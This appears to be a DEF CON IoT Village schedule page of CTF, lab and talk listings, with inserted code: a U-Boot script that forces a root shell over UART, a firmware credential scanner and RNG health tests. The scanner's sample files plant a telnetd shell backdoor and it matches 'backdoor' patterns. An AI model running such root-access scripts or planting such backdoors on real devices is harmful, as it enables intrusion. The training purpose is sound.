|Capture the Flag
In this three-time DEF CON Black Badge CTF, teams compete against one another by exploiting a network of off-the-shelf IoT devices. These 40+ devices all have known vulnerabilities, but successfully exploiting them requires lateral thinking, knowledge of networking, and competency in exploit development. CTFs are a great way to learn more about security and test your skills, so participants can join up in a team (or go alone) and compete for fun and prizes! Exploit as many devices as possible during the event; the top three teams will be rewarded.
The CTF is accessible to both virtual and on site attendees.
Prizes generously provided by INE and Hardwear.io
1st place: 1 year premium subscription to the INE platform and 1 EXPLIoT Kit provided by Hardwear.io
2nd place: $400 eLearnSecurity voucher
3rd place: $200 eLearnSecurity voucher
|IoT Village labs
IoT Hacking 101 is a set of quick, hands-on labs developed to teach the tools and techniques for discovering and exploiting some of the common weaknesses found in IoT devices today. Whether you're a penetration tester who has never hacked IoT devices or even someone who has never hacked anything(!), these self-guided labs walk you through all the steps, from analyzing router firmware and finding hidden backdoors to enumerating devices and performing remote exploits. Students work at their own pace following our IoT Hacking 101 guides, and instructors are on hand to provide assistance as needed and answer any questions. IoT Village currently offers 3 labs and is adding new labs in 2021 to expand our content even further.
|UART TO UBOOT TO ROOT
Rapid7 will be returning to the IoT Village this year with more hands-on hardware hacking exercises. In this year's exercises, we will guide attendees through a multistep process to gain full root access to a targeted IoT device via physical access. This series of exercises covers UART access, U-Boot console access, working with U-Boot environment variables, single-user mode access, identifying and mounting writable flash partitions, and creating a persistent account.
This activity will be available August 6-7 on site
Speakers: Deral Heiland, Morgan Holkesvik, James King, Erick Galinkin, Tod Beardsley
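The U-Boot part of that chain, as an added example that is not Rapid7's exercise material: once a UART adapter is wired to the board, the usual move is to stop autoboot, read the stored environment with printenv, and boot once with bootargs rewritten so the kernel runs /bin/sh instead of init (single-user mode). The driver below does exactly that over any object with pyserial-style read()/write(); the FakeUBoot class, the "=> " prompt, the environment contents and the 0x9f050000 kernel address are constructed for the demo and will differ per device. It deliberately uses setenv without saveenv so the change lives in RAM only.

```python
import time


class UBootError(RuntimeError):
    pass


def parse_printenv(output):
    """printenv output -> dict; skips banner/echo and the trailing
    'Environment size:' line, none of which carry a '='."""
    env = {}
    for line in output.splitlines():
        line = line.strip()
        if "=" in line and not line.startswith("Environment size"):
            key, _, value = line.partition("=")
            env[key] = value
    return env


def single_user_bootargs(bootargs, init="/bin/sh"):
    """Drop any existing init= token and append init=<shell>; console=,
    root= and mtdparts= are kept so the kernel still finds its rootfs."""
    tokens = [t for t in bootargs.split() if not t.startswith("init=")]
    return " ".join(tokens + [f"init={init}"])


def read_until(port, marker, timeout=5.0):
    """Collect bytes from port.read() until marker shows up."""
    buf, deadline = b"", time.monotonic() + timeout
    while marker not in buf:
        chunk = port.read(4096)
        if chunk:
            buf += chunk
        elif time.monotonic() > deadline:
            raise UBootError(f"no {marker!r} within {timeout}s; tail={buf[-120:]!r}")
    return buf


def run_command(port, cmd, prompt):
    """Send one console line; return its output minus the echo and prompt."""
    port.write(cmd.encode() + b"\n")
    text = read_until(port, prompt).decode(errors="replace")
    body = text.split("\n", 1)[1] if "\n" in text else ""
    return body.rsplit(prompt.decode(), 1)[0]


def interrupt_autoboot(port, prompt, attempts=30):
    """Keep sending Enter: the 'Hit any key to stop autoboot' window is
    only a second or two, so do not wait for the banner first."""
    buf = b""
    for _ in range(attempts):
        port.write(b"\n")
        buf += port.read(4096)
        if prompt in buf:
            return
        time.sleep(0.1)
    raise UBootError("no U-Boot prompt seen; check baud rate and TX/RX wiring")


def boot_single_user(port, prompt=b"=> ", init="/bin/sh"):
    """Stop autoboot, dump the env, boot once with init=<shell>.
    setenv without saveenv changes RAM only; the stored env is untouched."""
    interrupt_autoboot(port, prompt)
    env = parse_printenv(run_command(port, "printenv", prompt))
    if "bootargs" not in env:
        raise UBootError("no bootargs in env; bootcmd probably builds it, read bootcmd")
    new_args = single_user_bootargs(env["bootargs"], init)
    run_command(port, f"setenv bootargs {new_args}", prompt)
    port.write(b"boot\n")  # no prompt comes back once the kernel starts
    return {"env": env, "bootargs": new_args}


class FakeUBoot:
    """Constructed in-memory console so the flow runs without a board; with
    hardware pass serial.Serial('/dev/ttyUSB0', 115200, timeout=1) instead."""
    PROMPT = b"=> "

    def __init__(self, env):
        self.env, self.inbuf, self.saved, self.booted_with = dict(env), b"", False, None
        self.out = b"U-Boot 2020.04 (constructed)\nHit any key to stop autoboot:  2 \n"

    def read(self, size=4096):
        chunk, self.out = self.out[:size], self.out[size:]
        return chunk

    def write(self, data):
        self.inbuf += data
        while b"\n" in self.inbuf:
            line, _, self.inbuf = self.inbuf.partition(b"\n")
            self._handle(line.decode())

    def _handle(self, cmd):
        self.out += cmd.encode() + b"\n"  # console echo
        if cmd == "printenv":
            self.out += "".join(f"{k}={v}\n" for k, v in self.env.items()).encode()
            self.out += b"\nEnvironment size: 140/65532 bytes\n"
        elif cmd.startswith("setenv "):
            parts = cmd.split(" ", 2)
            self.env[parts[1]] = parts[2] if len(parts) > 2 else ""
        elif cmd == "saveenv":
            self.saved = True
        elif cmd == "boot":
            self.booted_with = self.env.get("bootargs")
            self.out += b"Starting kernel ...\n"
            return
        self.out += self.PROMPT
```

If printenv shows no bootargs, the boot command usually assembles it at runtime (look at bootcmd and any bootargs-building scripts), and on boards where bootm passes a device-tree chosen/bootargs node the same override goes there. Once the shell is up, the remaining steps on the page (remounting the writable partition and adding an account) happen inside that shell, not in U-Boot.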
Are you finding IoT hacking exciting but a little over your head? INE presents a gentle introduction with live, hands-on labs directly from our venerable Penetration Tester Student (PTS) Learning Path. To play on your own, PTS is 100% free as part of the INE Starter Pass and comes with slides, videos, and unlimited time in our virtual labs to prepare you for eLearnSecurity’s Junior Penetration Tester (eJPT) certification exam (not included). You’ve got nothing to lose and a life-changing career move to gain! Scan the QR code to sign up today.
This activity will be available August 6-7 on site
Speakers: Don Donzal, Lily Clark
|Black Box Challenges
Think you’ve got what it takes to hack devices you can’t see? Can you figure out and map the network/ecosystem? Is your Google-fu game strong? Push yourself to the limit in a real-world simulated CTF challenge where the only thing we give you is a single IP... the rest is up to you.
This content is exclusively onsite in Las Vegas, Nevada.
|10:00AM - 10:30AM
|When Penetration Testing Isn’t Penetration Testing At All
Abstract
When companies want to build secure IoT systems, they know they need to test their system for security flaws, which typically leads them to seek out “penetration testing.” However, this term has become so misused across the security community that it’s hard to decipher what is really happening.
Ted Harrington is the #1 best selling author of HACKABLE: How to Do Application Security Right, and the Executive Partner at Independent Security Evaluators (ISE), the company of ethical hackers famous for hacking cars, medical devices, web applications, and password managers. He’s helped hundreds of companies fix tens of thousands of security vulnerabilities, including Google, Amazon, and Netflix. Ted has been featured in more than 100 media outlets, including The Wall Street Journal, Financial Times, and Forbes. His team founded and organizes IoT Village, an event whose hacking contest is a three-time DEF CON Black Badge winner. He hosts the Tech Done Different podcast.
|10:45AM - 11:30AM
|Chloe Messdaghi and Camille Eddy
We often hear about the importance of Diversity, Equity, and Inclusion (DEI) and how companies are striving to do better. However, there are plenty of examples where the DEI being promoted is not actually happening behind the scenes. Stories from those who are marginalized in tech show that we still have a large problem with companies paying lip service and having no actual actions to show for it. One way to see whether a company is trying to do better on DEI is to look at its board and C-suite. Yet, still to this day, less than 20% of company boards represent marginalized identities.
Chloé Messdaghi is a tech changemaker who is innovating the tech and information security sectors to meet today’s and tomorrow’s demands by accelerating startups and providing solutions that empower. She is an international keynote speaker at major information security and tech conferences and events, and serves as a trusted source to reporters and editors at outlets such as Forbes and Business Insider. Additionally, she is one of Business Insider’s 50 Power Players. Camille Eddy is a Product Engineer and International Public Speaker. She earned her Bachelor of Science degree in Mechanical Engineering from the University of Idaho. Camille has given her talk “Recognizing Cultural Bias in AI” across the world, including in San Francisco, Washington DC and Budapest, helping technical and non-technical project managers, founders and engineering leads build better products. Finally, she coaches women building online platforms, helping them make a profitable business working on their passion.
|11:45AM - 12:30PM
|1.21 Gigawatts! Vulnerabilities in Solar Panel Controllers
Abstract
Embedded device security has come a long way since the days of telnet and default passwords. Product vendors are now doing more to secure their devices, but how effective are they? This presentation will outline many of the software and hardware-based attacks used to compromise embedded systems. It also discusses some of the mitigations used to prevent these attacks. Many previous IoT talks show the simplicity of hacking devices that have weak security or no hardening. In contrast, this presentation shows how even secured devices have attack surfaces that still need to be addressed. It demonstrates the need for embedded devices to incorporate a security lifecycle plan, and for hardware designs to be audited for security weaknesses before production. Topics to be covered include firmware image encryption, disabling UART console access, hardening JTAG development access, securing eMMC storage, NOR flash protection, processor glitching, update lifecycle attacks, avoiding custom crypto, dealing with reverse engineers, and initial device setup vs. authentication. None of these topics will be a deep dive. The intent is to show how they are attacked or utilized to mitigate specific attacks. To illustrate these topics the presentation will use a recent security audit of a US solar equipment manufacturer as a case study. The vendor incorporated many best practices for securing embedded devices but made some architecture decisions under the guise of security that ended up weakening their security posture rather than helping it. Finally, we'll show the ramifications of an attack against solar systems and how it could be used for racketeering. Attacks in this talk are beneficial to system designers, hobbyists, and researchers.
Bio
Waylon Grange is an experienced vulnerability researcher, reverse engineer, and developer. Prior to Stage 2, he worked for Symantec and the NSA. Waylon has been a speaker at Black Hat, DEF CON, RSA, CanSecWest, and DerbyCon and is credited with a US patent, multiple CVEs, and exposing APT groups. His in-depth knowledge of embedded systems is utilized to evaluate the security of IoT systems and develop electronic badges for conferences.
|12:45PM - 1:15PM
|LED Light Lunacy!
Abstract
All your LEDs are mine... How a case of lockdown boredom turned into LED lights for everyone!
Bio
Security Researcher at SpiderLabs
|1:30PM - 2:15PM
|5 years of IoT vulnerability research and countless 0days - A retrospective
|Alex "Jay" Balan
Abstract
How many 0days can a research team discover in 4 years of vulnerability research in IoT? How many of them are relevant and can be used even today? How to get started (or advance further) with IoT vulnerability research? This talk will answer all these questions and show you some hands-on shell-popping and authentication bypasses, as well as some new 0days published this year.
Bio
Alex "Jay" Balan is the Security Research Director and Spokesperson for Bitdefender. His career is focused on Information Security and Innovation, fields in which he has so far accumulated over 20 years of experience. He is now furthering security and privacy research and has been actively involved in creating awareness by speaking at a number of conferences including DEF CON, DerbyCon, RSA, BSides, ISC China, and many others.
|2:30PM - 3:15PM
|BLUEMONDAY Series – Exploitation & Mapping of vulnerable devices at scale through self-registration services (DATTO/EGNYTE/SYNOLOGY/MERAKI/GEOVISION)
Abstract
Vendors like DATTO, MERAKI, GEOVISION, SYNOLOGY, EGNYTE and others which leverage or depend on these self-registration services are imperiling data, networks, and businesses through insecure design, intentional design decisions, and web application flaws.
Ken Pyle is a partner of CYBIR, specializing in Information Security, exploit development, penetration testing and enterprise risk management. Ken is a graduate professor of CyberSecurity at Chestnut Hill College. He has published academic works on a wide range of topics and has presented at industry events such as ShmooCon, Secureworld, HTCIA International.
|3:30PM - 4:15PM
|“Alexa, have you been compromised?” — Exploitation of Voice Assistants in Healthcare (and other business contexts)
|Hutch (Justin Hutchens)
Abstract
As voice assistant technologies (such as Amazon Alexa and Google Assistant) become increasingly sophisticated, we are beginning to see adoption of these technologies in the workplace. Whether supporting conference room communications, or even supporting interactions between an organization and its customers, these technologies are becoming increasingly integrated into the ways that we do business. While implementations of these solutions can streamline operations, they are not always without risk. During this talk, the speaker will discuss lessons learned during a recent penetration test of a large-scale “Alexa for Business” implementation in a hospital environment where voice assistants were implemented to assist with patient interactions during the peak of the COVID-19 pandemic. The speaker will provide a live demonstration of how a cyber-criminal could potentially use pre-staged AWS Lambda functions to compromise an “Alexa for Business” device with less than one minute of physical access. Multiple attack scenarios will be discussed, including making Alexa verbally abuse her users (resulting in possible reputation damage), remote eavesdropping on user interactions, and even active “vishing” (voice phishing) attacks to obtain sensitive information. Finally, the talk will conclude with a discussion of best-practice hardening measures that can be taken to prevent your “Alexa for Business” devices from being transformed into foul-mouthed miscreants with malicious intent.
Bio
Justin Hutchens (“Hutch”) is the Assessments Services Practice Lead at Set Solutions and manages TVM, IR, and GRC services. He is the co-host of the "Ready, Set, Secure" InfoSec podcast. He is also the creator of Sociosploit, a research blog which examines exploitation opportunities on the social web – a confluence of his interests in both hacking and social psychology. Hutch has spoken at multiple conferences to include HouSecCon, ToorCon, and DEF CON.
|4:30PM - 5:15PM
|IoT Testing Crash Course
|Tim Jensen (EapolSniper)
Abstract
In this IoT 101-level talk I provide practical instruction to security-focused individuals who want to test IoT devices for critical vulnerabilities. Included will be basic network pentesting of the device, web app or other UI testing, extracting/downloading firmware, and using binwalk. This will also include reviewing binaries for potential backdoors, looking for hardcoded credentials, and whitebox code review of the UI interface to look for backdoors or other vulnerabilities. All testing will be done against publicly downloadable binaries.
Bio
Tim has 9 years of professional security experience, largely in network, IoT, and web application penetration testing. He ran a hack lab in Fargo, ND for 4 years where he taught hardware hacking and penetration testing on evenings and weekends. When not hacking, Tim enjoys cycling, walking, and live music.
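The firmware-review part of that checklist, as an added example that is not the speaker's material: after binwalk -e has unpacked a squashfs-root/ tree, a short triage pass over the extracted filesystem finds most of the hardcoded-credential and backdoor findings the abstract lists. The scanner below checks /etc/passwd and /etc/shadow for extra uid-0 accounts, blank password fields and crackable hashes, flags telnetd started from init scripts, spots PEM private keys, and runs a strings-and-grep pass for credential-looking text in binaries. The BusyBox-style sample rootfs, the placeholder hash and key, and the fake httpd binary are constructed for the demo.

```python
import os
import re
import tempfile

STRING_RE = re.compile(rb"[\x20-\x7e]{6,}")
CRED_HINT = re.compile(rb"(?i)passw(or)?d|backdoor|telnetd")
PEM_RE = re.compile(rb"-----BEGIN [A-Z ]*PRIVATE KEY-----")
LOCKED = ("*", "!")


def check_passwd(text):
    """Extra uid-0 users, blank password fields (login with no password)
    and crypt hashes stored in the world-readable passwd file."""
    out = []
    for line in text.splitlines():
        f = line.split(":")
        if len(f) < 7:
            continue
        user, pw, uid = f[0], f[1], f[2]
        if uid == "0" and user != "root":
            out.append(("extra-uid0", user))
        if pw == "":
            out.append(("empty-password", user))
        elif pw != "x" and not pw.startswith(LOCKED):
            out.append(("hash-in-passwd", user))
    return out


def check_shadow(text):
    """Anything not locked ('*', '!') is a hash you can attack offline."""
    out = []
    for line in text.splitlines():
        f = line.split(":")
        if len(f) < 2:
            continue
        if f[1] == "":
            out.append(("empty-password", f[0]))
        elif not f[1].startswith(LOCKED):
            out.append(("crackable-hash", f[0]))
    return out


def credential_strings(data, rel):
    """`strings | grep -i passw` over one binary, keeping the hit with its path."""
    return [("cred-string", f"{rel}: {m.group().decode()}")
            for m in STRING_RE.finditer(data) if CRED_HINT.search(m.group())]


def scan_rootfs(root):
    """Walk an extracted rootfs and return (kind, detail) findings."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue  # dangling symlink, device node
            if rel == "etc/passwd":
                findings += check_passwd(data.decode(errors="replace"))
            elif rel == "etc/shadow":
                findings += check_shadow(data.decode(errors="replace"))
            elif rel.startswith("etc/init.d/") or rel == "etc/inittab":
                if b"telnetd" in data:
                    findings.append(("telnet-at-boot", rel))
            elif PEM_RE.search(data):
                findings.append(("private-key", rel))
            elif b"\x00" in data[:4096]:  # binary-ish: run the strings pass
                findings += credential_strings(data, rel)
    return findings


def build_sample_rootfs(root):
    """Constructed tree with one of each problem; the hash and key are
    placeholders, not real secrets."""
    files = {
        "etc/passwd": "root:x:0:0:root:/root:/bin/sh\nadmin::0:0::/:/bin/sh\n"
                      "nobody:*:99:99::/:/bin/false\n",
        "etc/shadow": "root:$1$constructed$placeholderhash:0:0:99999:7:::\n"
                      "admin::0:0:99999:7:::\nnobody:*:0:0:99999:7:::\n",
        "etc/init.d/rcS": "#!/bin/sh\nmount -t proc proc /proc\n/usr/sbin/telnetd -l /bin/sh &\n",
        "etc/ssl/server.key": "-----BEGIN RSA PRIVATE KEY-----\nplaceholder\n-----END RSA PRIVATE KEY-----\n",
    }
    for rel, text in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(text)
    os.makedirs(os.path.join(root, "usr/bin"), exist_ok=True)
    with open(os.path.join(root, "usr/bin/httpd"), "wb") as fh:  # fake ELF with a baked-in default credential
        fh.write(b"\x7fELF\x01\x01\x01\x00" + b"\x00" * 8 + b"GET /login\x00default_password=s3cret\x00")


def demo():
    with tempfile.TemporaryDirectory() as root:
        build_sample_rootfs(root)
        return sorted(scan_rootfs(root))
```

Every cred-string hit still needs a look in a disassembler to see whether the string is a default that the setup flow overwrites or a comparison the login handler performs; the scanner only tells you where to start reading.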
|5:30PM - 6:15PM
|Defending IoT in the Future of High-Tech Warfare
Abstract
The increase in cyberattacks using IoT devices has exposed the vulnerabilities in the infrastructures that make up the IoT and has shown how small devices can affect the functioning of networks and services. This talk presents a review of the vulnerabilities that beset the IoT, assesses experiences in implementing RF attacks targeting the Internet of Things, and analyses various facets of the IoT-centricity of future military operations based on the IoT concept, IoT-led future shaping of things, challenges, and the developmental trajectories of major powers.
Bio
Harshit Agrawal is currently working as a Radio Security Researcher. He is enthusiastic about Sigint, Drone Pentesting, and IoT Security. He presented his research at Security conferences like RSAC USA, HITB Cyberweek, HITB Amsterdam, etc. Previously, he was President at CSI Chapter and Vice President for Entrepreneurship cell at MIT, where he also headed the team of security enthusiasts, giving him a good insight into cybersecurity and increased his thirst to explore more in this field.
|10:00AM - 10:45AM
|I used AppSec skills to hack IoT, and so can you
Abstract
We tend to think of AppSec and IoT as two separate infosec disciplines. Sure, the domain knowledge, attack vectors, and threat mitigation are not exactly the same in those two worlds. At the same time, as the hardware continues to evolve, we see more and more tiny general purpose computers around us. Many of these tiny computers nowadays run software that is written in a conventional programming language, listen on network ports, process data inputs, and communicate with the outside world. These devices can be attacked just like any other application running on a desktop, on a server, or in the cloud.
Alexei began his career as a software developer. A decade later, he realized that breaking code was way more fun than writing code, and decided to switch direction. He is now a full-time application security professional, with several years of assisting various development teams in delivering secure code, as well as security consulting. Outside of his day job, Alexei enjoys doing security research and learning new hacking techniques.
|11:00AM - 11:45AM
|You're Doing IoT RNG
|Dan "AltF4" Petro and Allan Cecil
Abstract
Think of a random number between '0' and infinity. Was your number '0'? Seriously? Crap. Well unfortunately, the hardware random number generators (RNG) used by your favorite IoT devices to create encryption keys may not work much better than you when it comes to randomness.
Dan "AltF4" Petro is Lead Researcher at Bishop Fox. Dan is widely known for the tools he creates: Eyeballer (a convolutional neural network pentest tool), the Rickmote Controller (a Chromecast-hacking device), Untwister (pseudorandom number generator cracker), and SmashBot (a merciless Smash Bros noob-pwning machine). Allan Cecil (dwangoAC) is a Security Consultant with Bishop Fox and the President of the North Bay Linux User’s Group. He acts as an ambassador for Tasvideos.org, a website devoted to using emulators to complete video games as quickly as the hardware allows. He participates in Games Done Quick charity speed running marathons using TASBot to entertain viewers with never-before-seen glitches in games.
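The check a practitioner would want for the claim above, as an added example that is neither the talk's material nor Bishop Fox tooling: before trusting a hardware RNG peripheral for key generation, run continuous health tests on its raw output. The two below follow the shape of the SP 800-90B repetition count and adaptive proportion tests; the proportion cutoff is computed here from the binomial tail rather than read from the standard's table, and h_bits is the min-entropy per byte the design claims (8 for a full-entropy source). The three sources are constructed stand-ins: a SHA-256 counter stream playing a sound RNG, a peripheral that reports success but returns zeros, and a two-bit-state generator that never repeats consecutively, which only the proportion test catches.

```python
import hashlib
import math

ALPHA = 2.0 ** -20  # false-alarm rate SP 800-90B uses for health tests


def rct_cutoff(h_bits):
    """Repetition count cutoff: a run this long of one value has probability
    <= ALPHA for a source with h_bits of min-entropy per sample."""
    return 1 + math.ceil(-math.log2(ALPHA) / h_bits)


def apt_cutoff(window, h_bits, alpha=ALPHA):
    """Smallest c with P[Binomial(window, 2^-h_bits) >= c] <= alpha: how
    often one value may recur in a window before we cry foul."""
    p = 2.0 ** -h_bits
    tail, pmf, c = 1.0, (1 - p) ** window, 0  # tail = P[X >= c], pmf = P[X = c]
    while tail > alpha:
        tail -= pmf
        c += 1
        pmf *= (window - c + 1) / c * p / (1 - p)
    return c


def repetition_count_test(samples, h_bits=8):
    """Catches a stuck source (all zeros, all ones). Returns (passed, fail_index)."""
    cutoff, run, last = rct_cutoff(h_bits), 0, None
    for i, s in enumerate(samples):
        run = run + 1 if s == last else 1
        last = s
        if run >= cutoff:
            return False, i
    return True, None


def adaptive_proportion_test(samples, h_bits=8, window=512):
    """Catches a source that is not stuck but repeats itself far too often
    (tiny state, heavy bias). Returns (passed, window_start)."""
    cutoff = apt_cutoff(window, h_bits)
    for start in range(0, len(samples) - window + 1, window):
        win = samples[start:start + window]
        if win.count(win[0]) >= cutoff:
            return False, start
    return True, None


def health_check(data, h_bits=8, window=512):
    """Run both tests on raw RNG output bytes."""
    samples = list(data)
    rct_ok, _ = repetition_count_test(samples, h_bits)
    apt_ok, _ = adaptive_proportion_test(samples, h_bits, window)
    return {"rct": rct_ok, "apt": apt_ok, "ok": rct_ok and apt_ok}


# Constructed sources standing in for an RNG peripheral:
def healthy_source(n, seed=b"constructed-seed"):
    """SHA-256 in counter mode: deterministic, but looks sound to these tests."""
    out, ctr = bytearray(), 0
    while len(out) < n:
        out += hashlib.sha256(seed + ctr.to_bytes(4, "big")).digest()
        ctr += 1
    return bytes(out[:n])


def stuck_source(n):
    """A peripheral that reports success but hands back zeros."""
    return bytes(n)


def tiny_state_source(n):
    """Two bits of state cycling 0,1,2,3: no consecutive repeats, so only
    the proportion test sees it."""
    return bytes(i % 4 for i in range(n))
```

Feed the raw peripheral output, not the conditioned output of a DRBG seeded from it: a CTR-DRBG will pass both tests even when seeded with a constant, which is exactly the failure these tests exist to surface.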
|12:00PM - 12:30PM
|Strategic Trust and Deception in the Internet of Things
Abstract
Game Theory is the study of choices and strategies made by rational actors, called "players," during times of conflict or competition. It has been used throughout history to map human conflict. Statisticians use game theory to model war, biology, and even football. In this talk, we will model interactions between IoT devices based on strategic trust: how agents decide to trust each other.
Raised in the woods of Alaska, Juneau attributes her love of hacking to a childhood spent building and breaking things. After studying computer science and economics, she moved to Dallas, Texas, where she found a home in the local community and started speaking at cons. Now Juneau works as a red teamer and continues her research in grad school. When she isn't programming or asking strangers about the prisoner's dilemma, Juneau breathes fire and runs DC214; Dallas's DefCon group.
|12:45PM - 1:30PM
|MIPS-X - The next IoT Frontier
|Patrick Ross, Zoltán Balázs
Abstract
IoT vulnerability research usually involves both static and dynamic analysis of the target device. To aid in this task, researchers typically perform some sort of emulation to enumerate the filesystem as well as run the respective binaries. Luckily, there are tools like QEMU and/or Buildroot to guide our path on the way, but this does not mean the way is smooth.
Patrick (0xn00b), a DEF CON 26 Black Badge holder, is the co-founder of Village Idiot Labs which helps run IoT Village across the globe. Patrick has created a fully immersible/virtual web-based lab environment that people can learn how to hack IoT without the need for their own tools, equipment or even prior knowledge. Zoltan (@zh4ck) is the Head of Vulnerability Research Lab at CUJO AI, a company focusing on smart home security. Before joining CUJO AI he worked as a CTO for an AV Tester company, as an IT Security expert in the financial industry, and as a senior IT security consultant. He is also the developer of the Hardware Firewall Bypass Kernel Driver (HWFWBypass), the Encrypted Browser Exploit Delivery tool (#IRONSQUIRREL) and the Sandbox tester tool to test Malware Analysis Sandboxes.
|1:45PM - 2:30PM
|Mind the Gap - Managing Insecurity in Enterprise IoT
Abstract
IoT is an ever-expanding attack surface about which we have many misconceptions and assumptions but for which we have very few policies, regulations or security. These are devices built for one purpose, not meant to be upgraded and rarely if ever patched. As more devices are enabled to connect and communicate online, in the relentless pursuit of innovation, we’ve put the cart before the horse and failed to construct a framework to effectively control and secure the capability created.
Cheryl Biswas is a Strategic Threat Intelligence Specialist with TD Bank in Toronto, Canada, experienced in security audits and assessments, privacy, disaster recovery and change management. She has an ITIL certification and a specialized honors degree in Political Science. She is actively engaged in the security community as a conference speaker and volunteer, mentors those entering the field, and champions women and diversity in cyber security as a founding member of “The Diana Initiative”.
|2:45PM - 3:30PM
|Reverse Supply Chain Attack - A Dangerous Pathway To Medical Facilities’ Networks
|Barak Hadad and Gal Kaufman
Abstract
The supply-chain attack vector has gained a lot of attention in the past year. Our talk, however, will present a different type of supply-chain attack vector: the reverse supply-chain attack.
Barak Hadad is a security researcher at Armis, responsible for hunting zero days and reverse engineering. Formerly an R&D team lead in the Israeli Defense Forces Intelligence, his current focus is unraveling the mysteries of various embedded devices, found in hospitals, factories and anything in-between.
|3:45PM - 4:15PM
|Ethics at the Edge: IoT as the Embodiment of AI for Rampant Intelligence Actuation
Abstract
In the eyes of a smart device and its human controllers, the world is an immense source of data and power. The expanding Internet of Things ecosystem only adds fuel to this, empowering real-time automatic sensing and actuation, posing regulatory dilemmas, easily exploitable definitions of trusted entities (e.g., see the 2021 Verkada hack), and measurements of security, robustness, and ethics that change apropos data in the blink of an eye.
Ria Cheruvu is an AI Ethics Lead Architect at the Intel Network and Edge engineering group, developing trustworthy AI products. She is 17 years old and graduated with her master’s degree in data science from Harvard University at 16. Her pathfinding domains include solutions for security and privacy for machine learning, fairness, explainable and responsible AI systems, uncertain AI, reinforcement learning, and computational models of intelligence.
|4:30PM - 5:00PM
|IoT devices as government witnesses: Can IoT devices ever be secure if law enforcement has unlimited access to their data?
|Jordan Sessler and Anthony Hendricks
Abstract
A man in Connecticut was arrested after his wife’s Fitbit implicated him in her murder. Prosecutors in Arkansas sought to use data from an Amazon Echo as evidence against a murder suspect. Local police sought access to car, TV, and even refrigerator data to monitor Black Lives Matter protestors, and the FBI did the same thing to help track down suspects in the aftermath of the January 6th, 2021 riot at the U.S. Capitol.
Jordan Sessler is an attorney who advises clients on data security as a member of Crowe & Dunlevy’s Cybersecurity & Data Privacy Practice Group. In that role, he regularly engages with legal issues related to IoT devices and has represented companies in disputes with law enforcement regarding the discoverability of user- and device-generated data. Prior to beginning his practice, he graduated from Harvard Law School and clerked for U.S. District Court Judge D.P. Marshall Jr. Anthony Hendricks is an attorney who advises clients as the chair of Crowe & Dunlevy’s Cybersecurity & Data Privacy Practice Group. In that role, he frequently analyzes and litigates legal issues related to IoT devices. Prior to beginning his practice, he studied as Howard University's first Marshall Scholar and later graduated from Harvard Law School. He now teaches cybersecurity law as an adjunct professor at Oklahoma City University School of Law.
|5:15PM - 6:00PM
|The Journey of Establishing IoT Trustworthiness and IoT Security Foundation
|Anahit Tarkhanyan, Dr. Amit Elazari and Ria Cheruvu
Abstract
The Internet of Things (IoT) ecosystem holds tremendous promise to promote innovation, productivity, and societal benefits. Yet, with increased connectivity, concerns remain about the growing attack surface. While the DEF CON community often focuses on the security aspects of these issues, the multidimensional nature of IoT devices and their combination with AI/ML solutions has sparked standardization activities focusing more generally on the concept of “IoT trustworthiness”. This talk will introduce the audience to the latest developments in the IoT security policy landscape, proposals for confidence/certification mechanisms emerging globally, and key IoT security baseline standards developments, while exploring the connection to the IoT trustworthiness concept across the IoT supply chain. We will describe a case study of IoT robustness and trustworthiness applied in the context of AI and smart analytics, including the importance of characterizing the behavior of data.
Bio
Dr. Anahit Tarkhanyan - Principal Engineer, Intel Corp., Network and Edge Group, IoT CTO Office